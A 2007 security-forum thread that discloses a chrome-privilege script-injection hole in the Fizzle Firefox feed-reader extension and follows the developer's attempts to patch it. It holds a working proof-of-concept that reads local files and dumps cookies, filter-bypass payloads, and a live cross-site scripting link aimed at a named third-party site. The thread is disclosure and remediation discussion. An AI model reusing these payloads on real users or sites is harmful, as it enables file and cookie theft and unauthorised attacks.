Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Fizzle : Firefox Extension Vulnerability
Date: March 24, 2007 02:27PM

Fizzle allows feeds to use HTML in feed data resulting in JavaScript being
run in the chrome: window with chrome permissions. The extension will
convert HTML entities back to their ASCII equivalents thus &lt; becomes <
and so forth. Various feeds fields are vulnerable including the title which
allows the code to execute when Fizzle is opened and no need for the feed
to be viewed.

The author Andy Frank was notified about the issue on 01/29/2007 we
corresponded on the issue and I even offered to create a patch which I did.
The patch did not meet his liking since the sanitation was too strict and
made some feeds who use certain tags like <p> for formatting to lose their
layout I told him it would be too difficult to sanitize the data unless its
strict because so many attack variations could be used, and best thing to
do is not allow HTML at all in the feed. On 02/20/2007 we ended discussions
on this and I notified addons.mozilla.org about the problem and the
developers lack of concern in fixing the extension or at least disabling
its download so people would not download the extension. Well Mozilla
didn't bother to remove it and have chosen to remove the extension in a
future date when addons.mozilla.org is updated. Since then over 2,000+
users have additionally downloaded the extension, invoking me to go
full-disclosure about it.
Fizzle 0.5 (previous versions likely vulnerable as well)
https://addons.mozilla.org/firefox/1307/

Below is the example I have tested out using version 0.5 and under nightly
Firefox. Please note that the HTML entities must be present for the exploit
to work. Place the below in your feed body and subscribe to the feed. View
the feed in Fizzle. When testing make sure you clear the Fizzle cache in
the fizzle folder under the Firefox profile.

An attacker can check if a feed subscriber has Fizzle because Fizzle's HTTP
request sends a custom user-agent which has the word 'Fizzle' in it.
Detecting that keyword an attacker can serve a malicious copy of the feed
instead.

- -------------------------------------------------------------------------
POC: Local File Reading and Cookie Reading (The HTML entities MUST be used)
- -------------------------------------------------------------------------
&lt;script&gt;

function read(readfile)
{
    var file = Components.classes[&quot;@mozilla.org/file/local;1&quot;]
             .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(readfile);
    var is =
Components.classes[&quot;@mozilla.org/network/file-input-stream;1&quot;]
           .createInstance(Components.interfaces.nsIFileInputStream);
    is.init(file, 0x01, 00004, null);
    var sis =
Components.classes[&quot;@mozilla.org/scriptableinputstream;1&quot;]
            .createInstance(Components.interfaces.nsIScriptableInputStream);
    sis.init(is);
    var output = sis.read(sis.available());
    alert(output);
}
read(&quot;C:\test.txt&quot;);

function getCookies()
{
    var cookieManager =
Components.classes[&quot;@mozilla.org/cookiemanager;1&quot;]
                      .getService(Components.interfaces.nsICookieManager);
    var str = '';
    var iter = cookieManager.enumerator;
    while (iter.hasMoreElements())
    {
        var cookie = iter.getNext();
        if (cookie instanceof Components.interfaces.nsICookie)
        {
            str += &quot;Host: &quot; + cookie.host
                 + &quot;\nName: &quot; + cookie.name
                 + &quot;\nValue: &quot; + cookie.value
                 + &quot;\n\n&quot;;
        }
    }
    alert(str);
}
getCookies()

&lt;/script&gt;
- -------------------------------------------------------------------------



Regards,
CM.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: rsnake
Date: March 24, 2007 03:15PM

Very nice find, CrYpTiC_MauleR! I posted about it on the blog as well. http://ha.ckers.org/blog/20070324/fizzle-firefox-extension-vulnerability/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 24, 2007 04:51PM

With 82 downloads per week this one is not exactly the most popular extension around :) Even Firefoxit has more downloads - and that extension has remote code execution as its concept. You can find lots of vulnerabilities like this one in the less popular extensions, that's why AMOv3 will introduce the sandbox concept so that only properly tested extensions will be publicly accessible.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: blad3
Date: March 25, 2007 01:39AM

Nice one CrYpTiC_MauleR!

@trev, AMOv3 = Mozilla Firefox v3? or?
do you have more info about this sandbox?



Edited 1 time(s). Last edit at 03/25/2007 01:40AM by blad3.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: ma1
Date: March 25, 2007 03:33AM

blad3 Wrote:

> AMO v3 = Mozilla Firefox v3? or?

AMO v3 = http://addons.mozilla.org version 3

> do you have more info about this sandbox?

http://blog.mozilla.com/webdev/2007/03/23/reviewing-the-sandbox-and-missing-add-ons/

Fizzle is still there, by the way:
https://addons.mozilla.org/en-US/firefox/addon/1307

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: blad3
Date: March 25, 2007 04:40AM

thanks ma1 ;)

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 09:01AM

Now that's wrong. I will ask for it to be moved back into the sandbox.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: jungsonn
Date: March 25, 2007 12:49PM

Nice one! this was the thing I feared most, to my knowledge it's the first find with extensions so far? And yes it's easy to detect the extension in various ways.

Great job on this one.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 01:24PM

No, it is not the first one - there was quite some fuzz about a GreaseMonkey vulnerability a while ago.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Date: March 25, 2007 01:41PM

Quote
trev
No, it is not the first one - there was quite some fuzz about a GreaseMonkey vulnerability a while ago.

Yeah GM also allowed file reading, I'm sure there are dozens of extensions out there that don't properly sanitize external input that run the input with elevated privileges.

I wonder how many of the pentesting extensions are vulnerable. All in all be careful what you install. Sad thing was the developer for Fizzle was totally aware of the code being able to run in chrome: and told me he just never bothered to fix it. Bad on his part for knowingly putting people at risk and worst letting 24,000 people download it. Thats one of the main reasons the issue pissed me off.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 07:16PM

Yes, the same hole has been fixed in NewsFox over a year ago. He was the developer of NewsFox as well and I think the hole has been fixed shortly after he handed the project over to another developer. I sent him two suggestions on how this can be fixed, one being pretty trivial (disable JavaScript and plugins in the content frame) - yet the answer was: "I am actually rewriting Fizzle from scratch to solve a host of problems (including this one)". Doesn't sound like this is urgent for him.

PS: There has been a bunch of cases where security vulnerabilities in extensions didn't reach the press. The most ugly one that I found were Conduit's generic toolbars - that was actually 93 extensions with a built-in backdoor. I don't think there ever was a statement from Conduit on this so one can argue whether this was malice or incredible incompetence, but I think it was the last straw that got them banned on addons.mozilla.org.



Edited 1 time(s). Last edit at 03/25/2007 07:23PM by trev.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Date: March 25, 2007 07:58PM

Interesting to know I was not the only one he basically lied to and shrugged off the issue. He also told me he was going to do a rewrite, don't know how many more people he will say that to before he actually does it =oP.

I'm not familiar with the process of extension submission to addon.mozilla.org. What kind of requirements must the extension have and go through before its approved? Does every minor version get audited for backdoor, spyware, etc, because I've come across a couple odd extensions that people claimed installed spyware on their systems.

If no checks are done then a disgruntled co-developer or developer for one of the popular extensions needs to just backdoor update to essentially make a quick and easy botnet. I personally think if Mozilla doesn't implement a solution for this problem it may well be the downfall of Firefox as a more 'secure' browser than IE.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 25, 2007 08:34PM

So far there hasn't been anything resembling code review on AMO. Every minor release was to be reviewed, but the reviewer only installed the extension and checked that it worked, looked like it did what it promised and didn't fry his hard drive. Now with the sandbox model anybody can easily publish new extensions/new versions but they will only be visible in the sandbox (pretty hard to get there) so early adopters can try them out. To get into the public area you have to pass a review that is supposed to be stricter than what was there before. Originally only 200 add-ons were put into the public area automatically but now they had to do this for another 1000 or so because of the public outcry - that's how Fizzle got through. The idea now is to implement stricter checks gradually, some automatic vulnerability testing should come as well later. I am pushing thorough code reviews at least for the most popular extensions but this is something that will certainly take time. AMO has very limited resources and so far it doesn't look like they were too successful communicating this to Mozilla. AMO has a long history of disasters and I am afraid it isn't going to end just here.



Edited 3 time(s). Last edit at 03/25/2007 08:37PM by trev.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: jungsonn
Date: March 26, 2007 12:55AM

Someone got some links/advisories about these vulnerable extensions?

I like to write an article about it soon.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: WhiteAcid
Date: March 26, 2007 07:01AM

For the greasemonkey flaw read this: http://it.slashdot.org/article.pl?sid=05/07/19/143241

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 26, 2007 08:59AM

Here is an example of a Conduit toolbar: http://www.gotuit.com/scenemaker/scenemaker_ff.html. Use "Save link as" on the download link.

XPI is a regular ZIP file, extract the file chrome/gotuit.jar. That's a ZIP file as well, you will need content/ebtoolbar.js from there. The EBToolbarApi_CT436359 object is their "API" they inject into web pages as window.EBToolbarApi variable. Note the ExecuteFunction method - it will run any JavaScript code that it receives, and it will run it with the privileges of the browser rather than the web page it originated from. I thought this backdoor has been removed in newer versions of the toolbar but obviously it wasn't.

This toolbar has been created with Conduit's toolbar generator: http://www.conduit.com/. They all have this code, and I suspect that this goes for the variants for Internet Explorer as well (since those are binary code it is much more difficult to prove).

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Date: March 27, 2007 09:09PM

Oh no, Andy Frank the developer finally has gotten talking with Mozilla about fixing the extension. Well he has made a new version to fix the issue and emailed me a copy. Of course as I expected he did much better filtering but still allows HTML to be inserted. Example:

<![CDATA[ <img src='http://www.google.com/intl/en_ALL/images/logo.gif' onload='alert(1)' /> ]]>

Without the CDATA the IMG tag is stripped. Wish he would just strip all tags only way to be safe. Will keep you guys updated on this.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Date: March 27, 2007 10:05PM

So his version 0.5.1 let the above pass, so he fixed it so it didnt. Send me a copy of 0.5.2 and well the following works.

<![CDATA[ <iframe src='javascript:alert(0);'></iframe> ]]>

=o( making me depressed. I wish he would just listen to me. He not doing whitelisting hes doing blacklisting which we all know is fruitless since you cant catch every bad thing that can be done.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: March 27, 2007 10:34PM

CrYpTiC_MauleR Wrote:
-------------------------------------------------------
> Oh no, Andy Frank the developer finally has gotten
> talking with Mozilla about fixing the extension.

I think "Mozilla" is me in that case :)

I am looking at his version 0.5.2 right now and I see the attempts to sanitize HTML. Now he uses a blacklist of forbidden attributes. I will try mailing him and explain to him again that instead of filtering JavaScript he can simply disable JavaScript.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: rsnake
Date: March 27, 2007 11:18PM

Ugh... mail him the Cheat Sheet... clearly he's not understanding obfuscation.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Date: March 28, 2007 12:32AM

trev,
are you Mike or Daniel....or Andy O.O

I don't know why he doesn't just display the feed in about:blank or something. I've seen other extensions do that, would solve the whole problem. He can then allow JS and all and not worry about an attacker getting chrome privs.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: jungsonn
Date: March 31, 2007 12:37PM

@trev thanks for the links!

It's amazing to see that the code reviewers allow such practice, clearly not rigorous enough.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: trev
Date: April 03, 2007 06:55AM

CrYpTiC_MauleR, I suggested using about:blank as well - but this is a little more complicated to implement, so I was more counting on him disabling JavaScript, at least as a short-term solution. Ideally he would do both. It seems he already tried disabling JavaScript but that broke some functionality because he was writing some of his own JavaScript code into that frame. So I told him how he can move it out of the frame. Waiting now.

And no, I am neither Mike nor Daniel. It seems Mike has been mailing Andy as well without CC'ing me, didn't know about that.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Date: April 03, 2007 05:23PM

Just happy the extension has been removed for the time being. Hopefully Andy will follow through on this and get the patch out as soon as possible so the 25K users will have a way to be safe...or put it on the back burner again and forget about it until someone reminds him.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: tx
Date: August 09, 2007 04:23PM

@NiceDeals: here you go http://www.nicedeals.co.uk/index.php?cPath=3&osCsid=%22%3E%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E%5D%21%3E%3C%21%5B
Hope that helps, spammer!
EDIT: Stopped it from alerting like 40 times.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 08/09/2007 04:25PM by tx.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: Anonymous User
Date: August 09, 2007 05:25PM

TX: I deleted the messages, on next spam he will be blocked.

Options: ReplyQuote
Re: Fizzle : Firefox Extension Vulnerability
Posted by: Anonymous User
Date: August 09, 2007 06:06PM

Hehe - already sent him a PM with several XSSes on his site... no answer yet

Options: ReplyQuote


Sorry, only registered users may post in this forum.